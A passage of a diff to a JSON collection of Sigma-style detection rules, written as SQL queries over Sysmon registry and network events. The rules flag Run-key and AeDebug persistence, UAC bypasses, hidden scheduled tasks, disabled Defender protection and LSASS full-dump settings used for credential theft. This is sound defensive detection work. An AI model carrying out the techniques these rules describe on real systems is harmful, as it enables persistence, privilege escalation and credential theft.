'%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "Dllhost Internet Connection", - "id": 
"cfed2f44-16df-4bf3-833a-79405198b277", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", "status": "test", - "description": "Detects Dllhost that communicates with public IP addresses", - "author": "bartblaze", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR 
DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" ], - "filename": "net_connection_win_dllhost_net_connections.yml" + "filename": "registry_set_comhijack_sdclt.yml" }, { - "title": "Script Initiated Connection", - "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection. 
Adversaries may use script to download malicious payloads.", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "net_connection_win_script.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - 
"author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "status": "experimental", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - 
"title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", - "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "title": "Enable Local Manifest Installation With Winget", + "id": "fa277e82-9b78-42dd-b05c-05555c7b6015", + "status": "experimental", + "description": "Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", "attack.defense_evasion", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Administrators or developers might enable this for testing purposes or to install custom private packages" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\AppInstaller\\\\EnableLocalManifestFiles' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_set_winget_enable_local_manifest.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + 
"status": "test", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Potential Persistence Via Visual Studio Tools for Office", - "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "status": "experimental", - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "author": "Bhabesh Raj", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". 
Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.t1137.006", - "attack.persistence" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate Addin Installation" + "Legitimate application that needs to do a full dump of their process" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\integrator.exe' ESCAPE '\\' OR Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" ], - "filename": "registry_set_persistence_office_vsto.yml" + "filename": 
"registry_set_lsass_usermode_dumping.yml" }, { - "title": "Wow6432Node CurrentVersion Autorun Keys Modification", - "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "title": "Classes Autorun Keys Modification", + "id": "9df5f547-c86a-433e-b533-f2794357e242", "status": "experimental", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", 
@@ -33005,334 +32721,371 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND Image LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (Details LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR Details = 'grpconv -o' OR Details LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND Details LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND 
Details LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (Image LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND Details LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR Image LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND Details LIKE '% /burn.runonce' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
(EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Details = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" + "filename": "registry_set_asep_reg_keys_modification_classes.yml" }, { - "title": "Outlook Security Settings Updated - Registry", - "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "title": "Disable PUA Protection on Windows 
Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "status": "experimental", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + ], + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + }, + { + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects changes to the registry values related to outlook security settings", - "author": "frack113", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1053.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_office_outlook_security_settings.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 
'%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "title": "Add Debugger Entry To AeDebug For Persistence", + "id": "092af964-4233-4373-b4ba-d86ea2890288", "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate use of the key to setup a debugger. 
Which is often the case on developers machines" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": 